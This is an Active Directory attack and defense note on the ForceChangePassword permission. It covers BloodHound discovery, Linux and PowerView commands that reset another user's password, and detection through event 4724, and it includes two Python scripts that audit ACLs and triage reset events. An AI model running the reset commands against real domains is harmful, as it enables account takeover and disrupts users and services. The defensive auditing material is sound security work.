Overview
The ForceChangePassword permission in Active Directory allows you to, believe it or not, change a user's password. If you have this permission over another user you can change their password without needing to know their current password.
Discovery
The easiest way to look for this is probably with BloodHound, where you can see the ForceChangePassword edge over a given user.
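The defender-side counterpart to that BloodHound check is an ACL review of the user object itself. The following is an added example, not code from the original notes: it walks a constructed list of ACEs shaped like the entries Get-Acl shows for an AD object (IdentityReference, ActiveDirectoryRights, ObjectType, AccessControlType) and reports every principal allowed the User-Force-Change-Password right, either directly, through all extended rights, or through GenericAll. The principal names and the expected-holder list are assumptions; the extended-right GUID is the real schema value.

```python
"""Audit of which principals hold the User-Force-Change-Password right on a
user object. Added example, not part of the original notes: the ACE records
below are constructed to mirror the fields Get-Acl shows for an AD object;
the principals are made up and EXPECTED_HOLDERS is an assumption."""

# Schema GUID of the User-Force-Change-Password extended right (real value).
FORCE_CHANGE_PASSWORD_GUID = "00299570-246d-11d0-a768-00aa006e0529"
# An ExtendedRight ACE carrying the null GUID grants every extended right.
NULL_GUID = "00000000-0000-0000-0000-000000000000"

# Assumption: principals that legitimately hold the right on ordinary users.
EXPECTED_HOLDERS = {"NT AUTHORITY\\SELF", "NT AUTHORITY\\SYSTEM", "CORP\\Domain Admins"}

# Constructed ACL for one user object (values are made up).
SAMPLE_ACL = [
    {"IdentityReference": "NT AUTHORITY\\SELF", "ActiveDirectoryRights": "ExtendedRight",
     "ObjectType": FORCE_CHANGE_PASSWORD_GUID, "AccessControlType": "Allow"},
    {"IdentityReference": "CORP\\Domain Admins", "ActiveDirectoryRights": "GenericAll",
     "ObjectType": NULL_GUID, "AccessControlType": "Allow"},
    {"IdentityReference": "CORP\\bob", "ActiveDirectoryRights": "ExtendedRight",
     "ObjectType": FORCE_CHANGE_PASSWORD_GUID, "AccessControlType": "Allow"},
    {"IdentityReference": "CORP\\helpdesk", "ActiveDirectoryRights": "ExtendedRight",
     "ObjectType": NULL_GUID, "AccessControlType": "Allow"},
    {"IdentityReference": "CORP\\eve", "ActiveDirectoryRights": "ExtendedRight",
     "ObjectType": FORCE_CHANGE_PASSWORD_GUID, "AccessControlType": "Allow"},
    {"IdentityReference": "CORP\\eve", "ActiveDirectoryRights": "ExtendedRight",
     "ObjectType": FORCE_CHANGE_PASSWORD_GUID, "AccessControlType": "Deny"},
    {"IdentityReference": "CORP\\alice", "ActiveDirectoryRights": "ReadProperty",
     "ObjectType": NULL_GUID, "AccessControlType": "Allow"},
]


def ace_basis(ace):
    """Return how this ACE confers the right, or None if it does not."""
    rights = {r.strip() for r in ace["ActiveDirectoryRights"].split(",")}
    obj = ace["ObjectType"].lower()
    if "GenericAll" in rights:
        return "GenericAll"
    if "ExtendedRight" in rights:
        if obj == FORCE_CHANGE_PASSWORD_GUID:
            return "ExtendedRight: User-Force-Change-Password"
        if obj == NULL_GUID:
            return "ExtendedRight: all extended rights"
    return None


def force_change_password_holders(acl):
    """Map principal -> basis for every principal allowed the right.

    A Deny ACE for the right on the same principal removes it. Inheritance
    order and group nesting are not modelled; expand group members
    separately before deciding a holder is benign.
    """
    denied = {ace["IdentityReference"] for ace in acl
              if ace["AccessControlType"] == "Deny" and ace_basis(ace) is not None}
    holders = {}
    for ace in acl:
        if ace["AccessControlType"] != "Allow":
            continue
        basis = ace_basis(ace)
        if basis and ace["IdentityReference"] not in denied:
            holders.setdefault(ace["IdentityReference"], basis)
    return holders


def unexpected_holders(acl, expected=EXPECTED_HOLDERS):
    """Holders that are not on the expected list: the ones to review."""
    return {p: b for p, b in force_change_password_holders(acl).items()
            if p not in expected}


if __name__ == "__main__":
    for principal, basis in unexpected_holders(SAMPLE_ACL).items():
        print(f"REVIEW {principal}: {basis}")
```

On the constructed ACL this flags CORP\bob (direct right) and CORP\helpdesk (all extended rights), ignores alice (read-only), and drops eve because a matching Deny is present. Run it against a real export by replacing SAMPLE_ACL with the ACEs of the user objects you care about.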
Exploitation
Linux:
net rpc password "[TARGET USER]" "[NEW PASSWORD]" -U "[DOMAIN]"/"[YOUR USER]"%"[YOUR PASSWORD]" -S "DomainController"
Windows:
# Credential object is needed only if you want to execute the command as a user you are not logged in as
$Password = ConvertTo-SecureString '[PASSWORD]' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('[DOMAIN]\[USER]', $Password)
# The new password you're going to set
$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
# Set-DomainUserPassword is a PowerView cmdlet, so PowerView must be imported first (path assumed)
Import-Module .\PowerView.ps1
# Omit -Credential if you are already running as the user who holds the permission
Set-DomainUserPassword -Identity [TARGET USER] -AccountPassword $NewPassword -Credential $Cred
This is a destructive action that will change the target user's password!
Detection & Evasion
- Live users will certainly notice when their password gets changed
- If you change a service account password it can stop functioning properly
- Event 4724 (An attempt was made to reset an account's password) will get generated regardless of success/failure
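Because 4724 is written for both successful and failed reset attempts, it is the natural place to hunt for this. The following is an added example, not code from the original notes: it triages a constructed set of Security log records shaped like exported 4724 events (SubjectUserName, TargetUserName, Keywords) and flags resets performed by accounts that are not expected to reset passwords, resets of service accounts, and failed attempts. The authorised-resetter list and the svc_ naming rule are assumptions for the example.

```python
"""Triage of Windows Security event ID 4724 (an attempt was made to reset an
account's password). Added example, not part of the original notes: the
records are constructed to mimic the EventData fields of exported 4724
events; AUTHORISED_RESETTERS and SERVICE_ACCOUNT_PREFIX are assumptions."""

# Constructed sample records (field names follow the 4724 EventData schema,
# values are made up). The 4738 record is included only to show the filter.
SAMPLE_EVENTS = [
    {"EventID": 4724, "Keywords": "Audit Success", "SubjectUserName": "helpdesk1",
     "TargetUserName": "jdoe", "TimeCreated": "2024-03-01T09:12:00Z"},
    {"EventID": 4724, "Keywords": "Audit Success", "SubjectUserName": "bob",
     "TargetUserName": "svc_sql", "TimeCreated": "2024-03-01T23:41:10Z"},
    {"EventID": 4724, "Keywords": "Audit Failure", "SubjectUserName": "bob",
     "TargetUserName": "alice", "TimeCreated": "2024-03-01T23:42:02Z"},
    {"EventID": 4738, "Keywords": "Audit Success", "SubjectUserName": "helpdesk1",
     "TargetUserName": "jdoe", "TimeCreated": "2024-03-01T09:12:01Z"},
]

# Assumptions: accounts expected to reset passwords, and a service-account prefix.
AUTHORISED_RESETTERS = {"helpdesk1", "helpdesk2"}
SERVICE_ACCOUNT_PREFIX = "svc_"


def triage_4724(events, authorised=AUTHORISED_RESETTERS, svc_prefix=SERVICE_ACCOUNT_PREFIX):
    """Return one finding per 4724 event that deserves a look.

    4724 is logged on the domain controller that processed the reset for
    both successful and failed attempts, so failures are kept: a caller
    who lacks the right still leaves this trace.
    """
    findings = []
    for ev in events:
        if ev.get("EventID") != 4724:
            continue
        subject = ev["SubjectUserName"]
        target = ev["TargetUserName"]
        reasons = []
        if subject not in authorised:
            reasons.append("subject is not an authorised password resetter")
        if target.lower().startswith(svc_prefix):
            reasons.append("target is a service account")
        if ev.get("Keywords") == "Audit Failure":
            reasons.append("reset attempt failed")
        if reasons:
            findings.append({"time": ev["TimeCreated"], "subject": subject,
                             "target": target, "reasons": reasons})
    return findings


def resets_per_subject(events):
    """Count 4724 events per subject account; a burst from one account is
    worth a look even when each individual reset looks routine."""
    counts = {}
    for ev in events:
        if ev.get("EventID") == 4724:
            counts[ev["SubjectUserName"]] = counts.get(ev["SubjectUserName"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in triage_4724(SAMPLE_EVENTS):
        print(f"{f['time']} {f['subject']} -> {f['target']}: {'; '.join(f['reasons'])}")
    print(resets_per_subject(SAMPLE_EVENTS))
```

On the constructed data the helpdesk reset of jdoe passes, while both of bob's attempts are flagged (a service-account reset, then a failed reset). Note the distinction from event 4723, which records a user changing their own password with the old one supplied; 4724 is the reset path that ForceChangePassword uses, so the subject and target differ in the cases that matter.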